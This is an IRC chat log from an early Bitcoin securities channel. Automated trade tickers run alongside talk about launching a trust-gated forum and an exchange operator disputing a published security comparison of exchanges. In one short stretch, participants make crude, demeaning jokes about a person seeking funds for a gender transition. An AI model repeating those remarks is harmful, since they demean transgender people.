Aug 27 20:39:31 [GLBSE] [FPGAMINING] 1 @ 0.9289 BTC [+] Aug 27 20:39:34 ;;buy 1 '0-262-24039-4' @ 2 BTC Aug 27 20:39:34 Order id 9842 created. Aug 27 20:42:15 [GLBSE] [PAJKA.BOND] 2 @ 0.084999 = 0.17 BTC [+] Aug 27 20:43:35 [GLBSE] [FPGAMINING] 2 @ 0.9289 = 1.8578 BTC [+] Aug 27 20:46:34 [GLBSE] [BDK.BND] 5 @ 0.10099 = 0.505 BTC [-] Aug 27 20:47:47 EmanuelDeOrtego well i could easily make a forum, but... Aug 27 20:47:51 is it worth it really ? Aug 27 20:48:22 mircea_popescu: It depends on activity Aug 27 20:48:33 Who here would use Mircea's forum for Bitcointalk-free speculation? Aug 27 20:48:43 tell you what we do : when six people ask for it i'll dump olympus up Aug 27 20:49:06 Sounds great. We'll see what happens, heh. Aug 27 20:50:23 [GLBSE] [GIGAMINING] 5 @ 0.92 = 4.6 BTC [-] Aug 27 20:51:47 well Aug 27 20:51:53 if its not invite only Aug 27 20:52:02 then it will be same Aug 27 20:53:46 [GLBSE] [FOO.PPPPT] 3 @ 0.3201 = 0.9603 BTC [+] Aug 27 20:53:48 [GLBSE] [FOO.PPPPT] 3 @ 0.32 = 0.96 BTC [-] Aug 27 20:54:10 prolly. Aug 27 20:54:23 maybe btc is just not mature enough to have a real forum ? Aug 27 20:54:34 ormaybe the forum dweller idiots have run everyone off it... Aug 27 20:54:55 i have an ideea actually : wot rating > 5 to post. Aug 27 20:54:57 how's that! Aug 27 20:55:33 that will certainly cut down on board trolls Aug 27 20:55:51 course... what if people start giving people wot ratings just to be on the forum ? Aug 27 20:56:03 *nod* Aug 27 20:56:10 i still <3 irc anyway :) Aug 27 20:57:07 [GLBSE] [JAH] 10 @ 0.15999 = 1.5999 BTC [-] Aug 27 20:57:29 there are 15 year old video games with more mature forums Aug 27 20:58:05 [GLBSE] [JAH] 4 @ 0.15999 = 0.64 BTC [-] Aug 27 20:58:26 [GLBSE] [JAH] 1 @ 0.15999 BTC [-] Aug 27 20:58:48 [GLBSE] [TYGRR.BOND-P] 1 @ 0.3499 BTC [+] Aug 27 21:00:13 interesting tying it to WOT ratings somehow Aug 27 21:00:27 is poluting the ratings really all that much of a risk? Aug 27 21:02:20 [GLBSE] [NYAN.C] 7 @ 0.69 = 4.83 BTC [-] Aug 27 21:03:34 well hard to tell. Aug 27 21:03:58 nanotube : if someone made a forum where posting rights were conditioned on a minimal wot rating, would you consider this detrimental to the wot integrity ? Aug 27 21:04:36 [GLBSE] [PPT.E] 24 @ 0.5 = 12 BTC [-] Aug 27 21:05:11 [GLBSE] [PPT.A] 13 @ 0.5 = 6.5 BTC [-] Aug 27 21:06:33 [GLBSE] [PPT.B] 12 @ 0.5 = 6 BTC [-] Aug 27 21:06:49 mircea_popescu: maybe an invite/rating hybrid, new users can only get an account if they are rated by a current user Aug 27 21:07:06 sockpuppettry. Aug 27 21:07:08 or a given number of current users Aug 27 21:07:28 mircea_popescu: if it just used cumulative wot, yes, probably will cause a bunch of shilling. if it used web of trust paths from some already-trusted members, no. Aug 27 21:07:50 so how would you best phrase it ? "connect to mirceapopescu" ? Aug 27 21:07:56 or get a line from someone over 100 ? Aug 27 21:08:28 i'm not sure if either of those ways is ideal Aug 27 21:08:30 level2 trust > X from selected wot members Aug 27 21:08:57 those selected members could be your mods Aug 27 21:08:59 maybe Aug 27 21:09:02 (you could extend it to level3 also Aug 27 21:09:05 ) Aug 27 21:09:06 smickles: right Aug 27 21:09:14 wouldn't this just make a higher level of shilling ? Aug 27 21:09:30 mircea_popescu: well, they'd have to convince people at the core to actually give them high ratings. Aug 27 21:09:31 has anyone seen the light about communism yet? Aug 27 21:09:39 communism is the one true ideology Aug 27 21:10:01 nanotube yea but i mean.. is is pretty much structurally the same thing, we're stressing core people for little direcrt benefit ti them Aug 27 21:10:02 copumpkin: i'm so communist that i bleed red Aug 27 21:10:07 smickles: whoa dude Aug 27 21:10:09 e.g., if someone makes a trade with me for a 1-rating, and then creates a bunch of shill identities who interrate each other with a bunch of high ratings... any of those identities would still have a maximum levelN trust from me of 1. Aug 27 21:10:14 smickles: come to #bitcoin-comrades Aug 27 21:10:23 nanotube o i see what you mean. Aug 27 21:10:52 well, the core people would presumably not care to make a bunch of .5btc trades with a bunch of noobs to give them out ratings. :) Aug 27 21:10:55 so no stress. Aug 27 21:11:00 nanotube how about this : manual approval of new users based on wot, undisclosed criteria. Aug 27 21:11:12 mircea_popescu: hehe sure, undisclosed criteria works. Aug 27 21:11:20 and irt'd be something common sense Aug 27 21:11:32 i mean let's face it, you can't abstract the human hand & eye from a matter of trust Aug 27 21:11:45 just make sure you mention that it's not cumulative rating. so people don't think "oh it must be a cumulative rating cutoff, let's shill" Aug 27 21:11:53 yes/ Aug 27 21:12:06 so like this you'd think it's ok from what you can see ? Aug 27 21:12:28 copumpkin: lol, is that even a chanel? Aug 27 21:12:49 smickles you believe evertything costalinkin tells you ? Aug 27 21:13:08 mircea_popescu: at some scale, the manual approval would be rough to impliment, no? Aug 27 21:13:21 how many users would you think there are, 500 ? Aug 27 21:13:52 you want to begin this with a max user count in mind? Aug 27 21:14:09 no but im jsut saying Aug 27 21:14:16 there aren't going to be five billion users are there. Aug 27 21:14:28 probably not Aug 27 21:14:37 Well, when you guys setup your elite club will one of you please send me an invite :) Aug 27 21:14:39 entire ideea is for to have a community Aug 27 21:14:48 you can't have an infinitely large community, the two are contradictory Aug 27 21:15:01 ;;gettrust BTCHero Aug 27 21:15:02 Trust relationship from user mircea_popescu to user BTCHero: Level 1: 1, Level 2: 22 via 13 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=mircea_popescu&dest=BTCHero Aug 27 21:15:07 ya ok :D Aug 27 21:15:07 Im calling china and letting them know now is the time to get in on mpex Aug 27 21:15:09 i like the idea of l2/l3 trust of the mods, and a liberal ban policy Aug 27 21:15:12 :) Aug 27 21:15:16 After that ill call India Aug 27 21:15:16 smickles: um Aug 27 21:15:18 smickles: maybe! Aug 27 21:15:23 gotta make sure we hit that 5 bil mark Aug 27 21:15:27 doffx lol Aug 27 21:15:36 mk, what the hell, lemme do this thing. Aug 27 21:15:45 if nobody uses it or it becomes STUPID i'll just rm it Aug 27 21:15:49 communism doesn't work... I actually haven't seen any system based on common decisions and resource sharing work... Too complicate to manage. Profit drive is an excellent managing tool which doesn't require to have everything managed by the authority... It's hard to get communism to work in a large population solely based on the willingness of each participant to actually share and Aug 27 21:15:49 enforcing it requires to centralize and give everything to the hands of the governments. In theory, it's good, in practice, I doubt it's going to be practical anytime soon seeing the human nature. Aug 27 21:16:03 mircea_popescu: might i suggest shred in place of rm? Aug 27 21:16:25 BTC-Mining my household/harem works just fine based on common decisions and resource sharing Aug 27 21:16:27 We need more regulated capitalism. Add more restrictions about what can and cannot be done. Aug 27 21:16:32 i make the decisions and share the resources. Aug 27 21:16:36 On a small scale, yes Aug 27 21:16:42 I said in a large population Aug 27 21:16:49 ^^ :p Aug 27 21:17:09 If you're just restriticting to a small group everyone agreed to join, communism works great. Aug 27 21:17:15 anyone want to name this new thing ? Aug 27 21:17:24 It's actually the best, makes the group stronger. Aug 27 21:17:28 polimedia.us/btcgfy ? Aug 27 21:17:49 bitcoin great forum yes? Aug 27 21:18:02 is that what btcgfy stands for? Aug 27 21:18:07 go fuck yourself, alternatively. Aug 27 21:18:30 it's this massive pr0n industry board. anyway. Aug 27 21:19:00 btcf ? Aug 27 21:19:31 btcf, it's concise Aug 27 21:19:51 /b/ has other connotations Aug 27 21:20:11 [GLBSE] [ASICMINER] 1 @ 0.09859999 BTC [-] Aug 27 21:25:11 [GLBSE] [OBSI.HRPT] 6 @ 0.1039 = 0.6234 BTC [-] Aug 27 21:29:16 [GLBSE] [ASICMINER] 4 @ 0.0986 = 0.3944 BTC [+] Aug 27 21:31:59 [MPEX] [F.GIGA.ETF] 6700 @ 0.00095163 = 6.3759 BTC [+] Aug 27 21:32:00 [MPEX] [F.GIGA.ETF] 686 @ 0.00095334 = 0.654 BTC [+] Aug 27 21:32:02 [MPEX] [F.GIGA.ETF] 5812 @ 0.00095582 = 5.5552 BTC [+] Aug 27 21:32:02 [MPEX] [F.GIGA.ETF] 2302 @ 0.00095629 = 2.2014 BTC [+] Aug 27 21:32:37 [MPEX] [F.GIGA.ETF] 193 @ 0.00095055 = 0.1835 BTC [-] Aug 27 21:32:39 [MPEX] [F.GIGA.ETF] 1100 @ 0.0009454 = 1.0399 BTC [-] Aug 27 21:32:39 [MPEX] [F.GIGA.ETF] 15305 @ 0.00094299 = 14.4325 BTC [-] Aug 27 21:32:40 [MPEX] [F.GIGA.ETF] 193 @ 0.00091526 = 0.1766 BTC [-] Aug 27 21:32:41 [MPEX] [F.GIGA.ETF] 1209 @ 0.00089493 = 1.082 BTC [-] Aug 27 21:34:46 [MPEX] [S.MPOE] 46120 @ 0.00038545 = 17.777 BTC [+] Aug 27 21:34:47 [MPEX] [S.MPOE] 11780 @ 0.00038548 = 4.541 BTC [+] Aug 27 21:39:53 [MPEX] [S.MPOE] 58800 @ 0.00038429 = 22.5963 BTC [-] Aug 27 21:39:54 [MPEX] [S.MPOE] 5700 @ 0.00038318 = 2.1841 BTC [-] Aug 27 21:42:51 [GLBSE] [OBSI.ABMO] 98 @ 0.08 = 7.84 BTC [+] Aug 27 21:42:53 [GLBSE] [OBSI.ABMO] 41 @ 0.08 = 3.28 BTC [+] Aug 27 21:43:13 i think it should contain word ass Aug 27 21:43:40 [GLBSE] [TYGRR.BOND-P] 1 @ 0.30021003 BTC [-] Aug 27 21:43:41 [GLBSE] [TYGRR.BOND-P] 10 @ 0.30011003 = 3.0011 BTC [-] Aug 27 21:43:42 [GLBSE] [TYGRR.BOND-P] 3 @ 0.3 = 0.9 BTC [-] Aug 27 21:43:49 [GLBSE] [GSDPT] 603 @ 0.0034 = 2.0502 BTC [+] Aug 27 21:44:51 like "assf" as assets form and not ass fucking Aug 27 21:45:12 [GLBSE] [BITBOND] 1 @ 0.467 BTC [+] Aug 27 21:45:15 [GLBSE] [OBSI.HRPT] 30 @ 0.1039 = 3.117 BTC [-] Aug 27 21:45:53 ;;ticker Aug 27 21:45:53 Best bid: 10.64843, Best ask: 10.65, Bid-ask spread: 0.00157, Last trade: 10.65, 24 hour volume: 148987, 24 hour low: 10.525, 24 hour high: 12.14999 Aug 27 21:46:52 [GLBSE] [ASICMINER] 10 @ 0.0986 = 0.986 BTC [+] Aug 27 21:47:29 [GLBSE] [ASICMINER] 5 @ 0.0986 = 0.493 BTC [+] Aug 27 21:47:53 [GLBSE] [FOO.PPPPT] 4 @ 0.3 = 1.2 BTC [-] Aug 27 21:48:33 [GLBSE] [FOO.PPPPT] 5 @ 0.375 = 1.875 BTC [+] Aug 27 21:49:26 down to 10.64 already? Aug 27 21:50:13 yeah? Aug 27 21:50:18 High volatility Aug 27 21:50:36 [GLBSE] [FOO.PPPPT] 6 @ 0.4469 = 2.6814 BTC [+] Aug 27 21:50:54 10.91495 Aug 27 21:51:16 Someone dumpe some shares Aug 27 21:51:30 some BTC* Aug 27 21:51:37 [MPEX] [O.BTCUSD.P120T] 619 @ 0.10934953 = 67.6874 BTC [-] Aug 27 21:51:40 arf, I'm thinking GLBSE too much Aug 27 21:51:46 lol Aug 27 21:51:58 [GLBSE] [FOO.PPPPT] 10 @ 0.447 = 4.47 BTC [+] Aug 27 21:52:00 [GLBSE] [FOO.PPPPT] 5 @ 0.4475 = 2.2375 BTC [+] Aug 27 21:52:01 [GLBSE] [FOO.PPPPT] 5 @ 0.4499 = 2.2495 BTC [+] Aug 27 21:52:21 [GLBSE] [ASICMINER] 60 @ 0.0986 = 5.916 BTC [+] Aug 27 21:52:30 [GLBSE] [FOO.PPPPT] 2 @ 0.4499 = 0.8998 BTC [+] Aug 27 21:55:49 [GLBSE] [OBSI.HRPT] 9 @ 0.1039 = 0.9351 BTC [-] Aug 27 21:57:34 [GLBSE] [TYGRR.BOND-B] 10 @ 0.09999999 = 1 BTC [-] Aug 27 21:58:12 [GLBSE] [NYAN.B] 2 @ 1 = 2 BTC [+] Aug 27 21:58:18 smickles, that link given by mircea_popescu has a number of factual errors Aug 27 21:58:30 there has been no user account compromise Aug 27 21:58:38 via dictionary attack Aug 27 21:58:43 [GLBSE] [NYAN.A] 2 @ 1 = 2 BTC [-] Aug 27 21:59:30 nefario: if you wouldn't mind listing all the factual error, i would like you to point them out Aug 27 21:59:43 I.1. Dictionary attack. Aug 27 21:59:54 no account has been compromised with a dictionary attack Aug 27 22:00:32 II. Interference with the server. Aug 27 22:00:39 Emails (salted & hashed ?) Aug 27 22:00:52 who ever salts and hashes email addresses? Aug 27 22:01:15 III.1. Legal. Aug 27 22:01:37 Unregistered. Public face seems to be an English national located in China. Aug 27 22:01:43 he was assuming that you salted and hashe the email addresses of your uses to protect leakage inthe event the db was taken (i guess) Aug 27 22:01:43 I live in the UK Aug 27 22:01:54 weird assumption Aug 27 22:02:04 as it would mean we couldn't contact our users Aug 27 22:02:21 Holds personally indentifying information of users without a license (an offense in the EU). Aug 27 22:02:42 there is no requirement of a "licence" to hold users data Aug 27 22:02:43 [GLBSE] [TYGRR.BOND-P] 1 @ 0.2901 BTC [-] Aug 27 22:02:52 merely to comply with data protection Aug 27 22:03:02 ah Aug 27 22:03:04 [GLBSE] [TYGRR.BOND-P] 1 @ 0.29 BTC [-] Aug 27 22:03:09 Either the exchange itself, the public face or both may be identified at a later date as Does in the Cartmell - Bitcoinica lawsuit. Aug 27 22:03:25 raising the point that GLBSE is vulnerable to legal action, Aug 27 22:03:38 but he himself is also vulnerable to Aug 27 22:03:53 [GLBSE] [TYGRR.BOND-P] 1 @ 0.2601 BTC [-] Aug 27 22:03:54 [GLBSE] [TYGRR.BOND-P] 8 @ 0.26 = 2.08 BTC [-] Aug 27 22:03:55 III.2. Inheritance of assets. Aug 27 22:04:01 Suspension of activity would likely include an account claiming procedure, similar to Bitcoinica’s. Aug 27 22:04:06 which is bullshit Aug 27 22:04:22 we actually have freequent backups of our server data Aug 27 22:04:44 [GLBSE] [OBSI.HRPT] 1 @ 0.1039 BTC [-] Aug 27 22:04:44 bitcoinica had the account claiming proceedure because they lost their DB Aug 27 22:04:50 [GLBSE] [OBSI.HRPT] 1 @ 0.1039 BTC [-] Aug 27 22:04:53 [GLBSE] [TYGRR.BOND-P] 7 @ 0.26 = 1.82 BTC [-] Aug 27 22:05:00 GLBSE can provide users with codes for assets Aug 27 22:05:03 [GLBSE] [OBSI.HRPT] 3 @ 0.1039 = 0.3117 BTC [-] Aug 27 22:05:08 and issuers with lists of what codes have how many Aug 27 22:06:05 Are asset issuers unable to issue more of an asset on mpex? Aug 27 22:06:20 only with manual approval, iirc Aug 27 22:06:25 [GLBSE] [ASICMINER] 4 @ 0.0973 = 0.3892 BTC [-] Aug 27 22:06:27 [GLBSE] [ASICMINER] 2 @ 0.0972 = 0.1944 BTC [-] Aug 27 22:06:47 also most of the assets on mpex are actually provided by mircea_popescu Aug 27 22:06:59 where as most of the assets on GLBSE do not Aug 27 22:07:45 I.2. Session stealing. Aug 27 22:07:50 GLBSE Theoretically possible. Aug 27 22:08:03 only if there are unprotected vulnerabilities Aug 27 22:08:21 unless mircea_popescu knows what precautions we take to protect sessions he can only postulate Aug 27 22:08:50 hi nefario. please put the observations as comments there so we have a trail. Aug 27 22:08:59 if there's any innacuracies etc they can be fixed. Aug 27 22:09:10 thread link Aug 27 22:09:20 http://trilema.com/2012/security-comparison-of-bitcoin-denominated-instruments-exchanges/ Aug 27 22:09:23 All I want is receipts verifiable by the issuer. Aug 27 22:09:26 are* Aug 27 22:09:37 what about the loss of GPG keys? Aug 27 22:09:56 if a user loses their key how do you prove ownership of assets on mpex? Aug 27 22:09:59 srsly better discussed there than here, irc records are iffy. Aug 27 22:10:15 not asking for the record Aug 27 22:10:19 looking for an answer Aug 27 22:10:31 how do you handle lost users keys? Aug 27 22:10:37 exactly same way btc handles it. Aug 27 22:10:41 known as sol. Aug 27 22:10:42 Too bad, so sad. Aug 27 22:10:51 Take responsibility for yourself. Aug 27 22:10:56 Don't depend on others. Aug 27 22:10:57 Etc. Aug 27 22:11:00 so no way for users to recover their funds if keys are lost Aug 27 22:11:11 nope. lose your wallet, lose your btc Aug 27 22:11:17 That's a feature if you think about it. Aug 27 22:11:17 lose your gpg key, lose your assets. Aug 27 22:11:25 Nobody can take your funds. Aug 27 22:11:30 a user could protect against lost keys by cleasigning another key and keeping that key supersafe Aug 27 22:11:40 could do Aug 27 22:11:45 there *might* be recovery available, but it's not promised. Aug 27 22:12:03 but users are more likely to lose keys than they are to lose access to something like their email Aug 27 22:12:04 in other news http://polimedia.us/btcf/index.php Aug 27 22:12:17 who wanted an invite ? /me reads up Aug 27 22:13:47 Registered Aug 27 22:13:55 Invite me, if you please. Aug 27 22:14:00 i've activated both of you Aug 27 22:14:17 it's pretty barebone so if any features needed etc, just say. Aug 27 22:14:38 yourdomain.com? Aug 27 22:14:40 I don't think users need to be babied if they are in a financial market where money can be lost very easily. Aug 27 22:14:49 ahah smickles 1 sec Aug 27 22:15:18 mm da fuck do i change that ? Aug 27 22:15:30 in an unrelated note Aug 27 22:15:37 someone looking to raise funding for a sex change Aug 27 22:15:38 https://bitcointalk.org/index.php?topic=103020.0 Aug 27 22:15:56 L O L Aug 27 22:16:09 You're definitely approving that security, I'm sure. ; ) Aug 27 22:16:39 there are currently no new securities being approved by GLBSE for the time being Aug 27 22:16:42 if they're changing from m to f i'll buy a coupla shares Aug 27 22:17:01 until after we've segregated the market into BLUE WHITE and PINK Aug 27 22:17:08 mircea_popescu, thats just wrong. Aug 27 22:17:16 will also have to wait until Im back in London Aug 27 22:17:22 Doffx y ? Aug 27 22:17:29 was looking at office space as well Aug 27 22:17:30 It just is :) Aug 27 22:17:38 going to be hiring 2 more people Aug 27 22:18:09 hey, too many douches going about supposedly being male Aug 27 22:18:09 What type of Job will it be? Aug 27 22:18:13 just cut the pecker off be done with it Aug 27 22:18:18 haha Aug 27 22:18:31 [GLBSE] [ASICMINER] 1 @ 0.097 BTC [-] Aug 27 22:18:36 lol Aug 27 22:18:37 [GLBSE] [BIB.PIRATE] 2 @ 0.15 = 0.3 BTC [-] Aug 27 22:18:38 mircea_popescu: it's a little more delicate than that Aug 27 22:18:38 popescu: I am with you on that. Aug 27 22:18:44 lack of cock doesn't make you a woman Aug 27 22:19:01 It makes you a Asian monk of some weird sect. Aug 27 22:19:23 well i guess it must be. Aug 27 22:19:24 Doffx: one business development, one marketing & design Aug 27 22:19:50 ok, somebody post something. Aug 27 22:19:58 a sex change. Aug 27 22:20:10 I can't post Aug 27 22:20:17 At least not from what I can see Aug 27 22:20:36 srsly ?! Aug 27 22:20:44 mircea for a new forum to work it would have to be created by a group of people. Aug 27 22:20:48 lemme fix the permission Aug 27 22:20:52 WE ARE A GROUP OF PEOPLE Aug 27 22:20:54 No one person is going to make a new forum Aug 27 22:20:59 That isn't what I mean Aug 27 22:21:01 usagi well, the group of people was asking about it Aug 27 22:21:16 [GLBSE] [TYGRR.BOND-P] 1 @ 0.25 BTC [-] Aug 27 22:21:17 [GLBSE] [TYGRR.BOND-P] 4 @ 0.25 = 1 BTC [-] Aug 27 22:21:26 mircea: It's for off-topic mainly Aug 27 22:21:32 All else works Aug 27 22:21:56 Nope Aug 27 22:22:00 The Exchange doesn't work Aug 27 22:22:12 EmanuelDeOrtego try nao ? Aug 27 22:22:19 [GLBSE] [KRAKEN] 8 @ 0.01 = 0.08 BTC Aug 27 22:22:36 http://polimedia.us/btcf/viewforum.php?f=8 No new topic button there. Aug 27 22:24:48 umm Aug 27 22:24:57 didn't you just make a topic EmanuelDeOrtego ? Aug 27 22:25:44 In off-topic Aug 27 22:25:51 The other boards don't seem to work Aug 27 22:26:04 http://polimedia.us/btcf/viewforum.php?f=8 Aug 27 22:26:32 o i think you need to make 3 posts first Aug 27 22:26:34 lol Aug 27 22:28:58 okay Aug 27 22:29:05 how are you supposed to make 3 posta Aug 27 22:29:10 when there are no threads Aug 27 22:29:22 it's a conspiraci. anyway, did it werk ? Aug 27 22:29:23 [GLBSE] [GIGAMINING] 4 @ 0.89021 = 3.5608 BTC [-] Aug 27 22:29:23 [GLBSE] [GIGAMINING] 6 @ 0.89011 = 5.3407 BTC [-] Aug 27 22:29:25 [GLBSE] [GIGAMINING] 3 @ 0.89 = 2.67 BTC [-] Aug 27 22:29:26 [GLBSE] [GIGAMINING] 1 @ 0.87 BTC [-] Aug 27 22:29:27 [GLBSE] [GIGAMINING] 9 @ 0.863 = 7.767 BTC [-] Aug 27 22:29:29 [GLBSE] [GIGAMINING] 6 @ 0.862 = 5.172 BTC [-] Aug 27 22:29:30 [GLBSE] [GIGAMINING] 1 @ 0.861 BTC [-] Aug 27 22:29:39 nope Aug 27 22:29:46 mhhh this is so opaque. lemme see! Aug 27 22:30:34 [GLBSE] [OBSI.HRPT] 50 @ 0.1039 = 5.195 BTC [-] Aug 27 22:31:41 well it says users can start new topix wtf. Aug 27 22:31:50 let me try again Aug 27 22:32:03 You should really use SMF but this will work Aug 27 22:32:08 y smf ? Aug 27 22:32:09 [GLBSE] [MMM] 1 @ 0.7999 BTC [+] Aug 27 22:32:10 [GLBSE] [MMM] 3 @ 0.9 = 2.7 BTC [+] Aug 27 22:32:19 Because it's conformist Aug 27 22:32:21 and familiar Aug 27 22:32:28 and people like conformist and familiar Aug 27 22:32:40 this looks a lot closer to the shitty look i go for. Aug 27 22:32:45 [GLBSE] [BIB.PIRATE] 11 @ 0.1999 = 2.1989 BTC [+] Aug 27 22:32:46 [GLBSE] [BIB.PIRATE] 18 @ 0.2 = 3.6 BTC [+] Aug 27 22:32:53 Ahahaha Aug 27 22:32:58 [GLBSE] [GMVT-BOT] 42 @ 0.17 = 7.14 BTC [-] Aug 27 22:33:22 I like how your pages don't even pass W3C validation ; ) Aug 27 22:33:33 on the forum even !? Aug 27 22:33:47 I don't know about the forum Aug 27 22:33:55 I'm talking about the exchange and such. Aug 27 22:34:04 o Aug 27 22:34:39 you never saw the old page did you Aug 27 22:37:14 [GLBSE] [FDBF] 35 @ 0.1499998 = 5.25 BTC [+] Aug 27 22:37:47 Buy moar GDSTP Aug 27 22:37:55 [GLBSE] [MMM] 10 @ 0.9 = 9 BTC [+] Aug 27 22:38:53 EmanuelDeOrtego http://polimedia.us/btcf/viewtopic.php?f=6&t=4 wtf you on about omg! Aug 27 22:38:59 it works you have me on wild goose chases Aug 27 22:39:15 Mining works Aug 27 22:39:19 The Exchange does not Aug 27 22:39:24 or whatever it is called Aug 27 22:39:27 not The Exchange but Aug 27 22:39:29 uhhhh Aug 27 22:39:37 the securities board and exchanges board Aug 27 22:39:48 http://polimedia.us/btcf/viewforum.php?f=8 Aug 27 22:40:19 [GLBSE] [PUREMINING] 2 @ 0.09799 = 0.196 BTC [-] Aug 27 22:40:25 Rename Exchanges discussion to Securities, Currencies and Speculation Aug 27 22:40:51 nao ? Aug 27 22:41:10 [MPEX] [S.MPOE] 13600 @ 0.00038318 = 5.2112 BTC [-] Aug 27 22:41:22 Yes! Thank you! Aug 27 22:41:40 phew. Aug 27 22:46:24 o hey, boards are kinda fun. Aug 27 22:47:01 They are. Let's see if I can get more people on it. Aug 27 22:48:20 Who's OP here? Aug 27 22:49:53 [GLBSE] [OBSI.HRPT] 140 @ 0.1039 = 14.546 BTC [-] Aug 27 22:50:16 kakobrekla is the @ Aug 27 22:51:10 kakobrekla: Add the forum to the topic Aug 27 22:51:18 why ? Aug 27 22:51:50 So people always know about it. Aug 27 22:51:54 It couldn't hurt. Aug 27 22:53:13 umm Aug 27 22:53:15 thats up to mp Aug 27 22:53:20 [MPEX] [F.GIGA.ETF] 7216 @ 0.00089493 = 6.4578 BTC [-] Aug 27 22:53:25 yes or no mircea_popescu ? Aug 27 22:55:18 yawn ... any news? Aug 27 22:55:22 [GLBSE] [TYGRR.BOND-P] 1 @ 0.3438 BTC [+] Aug 27 22:55:27 well sure... Aug 27 22:56:35 [GLBSE] [ASICMINER] 5 @ 0.097 = 0.485 BTC [-] Aug 27 22:56:35 I guess not... nobody is talking Aug 27 22:56:46 off I go.... Aug 27 22:57:44 any news about what? Aug 27 22:58:33 [MPEX] [S.MPOE] 62600 @ 0.000384 = 24.0384 BTC [+] Aug 27 22:58:41 [GLBSE] [NYAN.C] 1 @ 0.69 BTC [-] Aug 27 22:58:49 [MPEX] [F.GIGA.ETF] 5100 @ 0.00091571 = 4.6701 BTC [+] Aug 27 22:59:06 [GLBSE] [ASICMINER] 10 @ 0.0985 = 0.985 BTC [+] Aug 27 22:59:57 boonies4u: BTCST I assume Aug 27 23:00:12 i'd check #btcst for that Aug 27 23:00:20 unless he's b& Aug 27 23:00:25 he is in there too Aug 27 23:00:47 well then :P Aug 27 23:02:24 [GLBSE] [FOO.PPPPT] 3 @ 0.2501 = 0.7503 BTC [-] Aug 27 23:03:19 [GLBSE] [GSDPT] 102 @ 0.0034 = 0.3468 BTC [+] Aug 27 23:05:47 [GLBSE] [OBSI.HRPT] 15 @ 0.104 = 1.56 BTC [+] Aug 27 23:05:49 [GLBSE] [OBSI.HRPT] 41 @ 0.104 = 4.264 BTC [+] Aug 27 23:07:33 [GLBSE] [OBSI.HRPT] 134 @ 0.10486 = 14.0512 BTC [+] Aug 27 23:07:34 [GLBSE] [OBSI.HRPT] 99 @ 0.1049 = 10.3851 BTC [+] Aug 27 23:08:09 [MPEX] [F.GIGA.ETF] 4900 @ 0.00093793 = 4.5959 BTC [+] Aug 27 23:08:10 [MPEX] [F.GIGA.ETF] 7400 @ 0.00094233 = 6.9732 BTC [+] Aug 27 23:09:11 [GLBSE] [OBSI.HRPT] 125 @ 0.105 = 13.125 BTC [+] Aug 27 23:09:29 [GLBSE] [MMM] 1 @ 0.9 BTC [+] Aug 27 23:13:34 [MPEX] [S.MPOE] 12800 @ 0.00038455 = 4.9222 BTC [+] Aug 27 23:14:02 [GLBSE] [TYGRR.BOND-P] 3 @ 0.3439 = 1.0317 BTC [+] Aug 27 23:14:03 [GLBSE] [TYGRR.BOND-P] 13 @ 0.344 = 4.472 BTC [+] Aug 27 23:14:04 [GLBSE] [TYGRR.BOND-P] 15 @ 0.3449 = 5.1735 BTC [+] Aug 27 23:14:05 [GLBSE] [TYGRR.BOND-P] 69 @ 0.345 = 23.805 BTC [+] Aug 27 23:16:17 [GLBSE] [MMM] 1 @ 0.9 BTC [+] Aug 27 23:19:07 [MPEX] [S.MPOE] 400 @ 0.000384 = 0.1536 BTC [-] Aug 27 23:19:09 [MPEX] [S.MPOE] 7600 @ 0.00038318 = 2.9122 BTC [-] Aug 27 23:19:10 [MPEX] [S.MPOE] 4530 @ 0.00038225 = 1.7316 BTC [-] Aug 27 23:19:59 [MPEX] [S.MPOE] 1300 @ 0.00038225 = 0.4969 BTC [-] Aug 27 23:22:12 [MPEX] [F.GIGA.ETF] 11300 @ 0.00094233 = 10.6483 BTC [+] Aug 27 23:26:19 lol @ oracularity 1503-3 Aug 27 23:27:42 whart's tht ? Aug 27 23:27:45 ? Aug 27 23:27:54 mircea_popescu: you don't know of the oracle? Aug 27 23:27:56 Diablo-D3 join my forum! Aug 27 23:28:30 [GLBSE] [BIB.PIRATE] 12 @ 0.2 = 2.4 BTC [+] Aug 27 23:28:39 mircea_popescu: http://cgi.cs.indiana.edu/~oracle/digest.cgi?N=1503#1503-03 Aug 27 23:28:55 .wik usenet oracle Aug 27 23:28:56 "The Internet Oracle (historically known as The Usenet Oracle) is an effort at collective humor in a pseudo-Socratic question-and-answer format." - http://en.wikipedia.org/wiki/Usenet_oracle Aug 27 23:28:59 [GLBSE] [PIMP] 1 @ 0.16 BTC [-] Aug 27 23:29:06 lol Aug 27 23:30:10 [GLBSE] [BIF.BTCST.PPT] 20 @ 0.2 = 4 BTC [+] Aug 27 23:30:31 smickles: BAM Aug 27 23:31:31 [MPEX] [S.MPOE] 895 @ 0.00038225 = 0.3421 BTC [-] Aug 27 23:32:16 [GLBSE] [ASICMINER] 21 @ 0.0985 = 2.0685 BTC [+] Aug 27 23:32:56 [GLBSE] [ASICMINER] 1 @ 0.0985 BTC [+] Aug 27 23:34:49 is it the usenet oracle still alive? Aug 27 23:35:52 apparently. Aug 27 23:38:58 [GLBSE] [RAREEARTH] 3 @ 0.01 = 0.03 BTC [+] Aug 27 23:39:42 [GLBSE] [OBSI.HRPT] 50 @ 0.105 = 5.25 BTC [+] Aug 27 23:41:31 [GLBSE] [YABMC] 10 @ 0.135 = 1.35 BTC [+] Aug 27 23:42:05 http://cgi.cs.indiana.edu/~oracle/bestof.cgi?N=1451-1475#1470-08 Aug 27 23:42:20 er, the one below that one Aug 27 23:49:50 [GLBSE] [OBSI.HRPT] 7 @ 0.105 = 0.735 BTC [+] Aug 27 23:54:40 [MPEX] [S.MPOE] 1600 @ 0.00038262 = 0.6122 BTC [+] Aug 28 00:00:56 [MPEX] [F.GIGA.ETF] 4127 @ 0.00095629 = 3.9466 BTC [+] Aug 28 00:01:59 [GLBSE] [MMM] 20 @ 0.9 = 18 BTC [+] Aug 28 00:07:44 [GLBSE] [PUREMINING] 12 @ 0.08 = 0.96 BTC [-] Aug 28 00:07:44 [GLBSE] [PUREMINING] 3 @ 0.0792 = 0.2376 BTC [-] Aug 28 00:07:46 [GLBSE] [PUREMINING] 52 @ 0.0762 = 3.9624 BTC [-] Aug 28 00:07:47 [GLBSE] [PUREMINING] 80 @ 0.0761 = 6.088 BTC [-] Aug 28 00:07:48 [GLBSE] [PUREMINING] 6 @ 0.076 = 0.456 BTC [-] Aug 28 00:07:49 [GLBSE] [PUREMINING] 63 @ 0.076 = 4.788 BTC 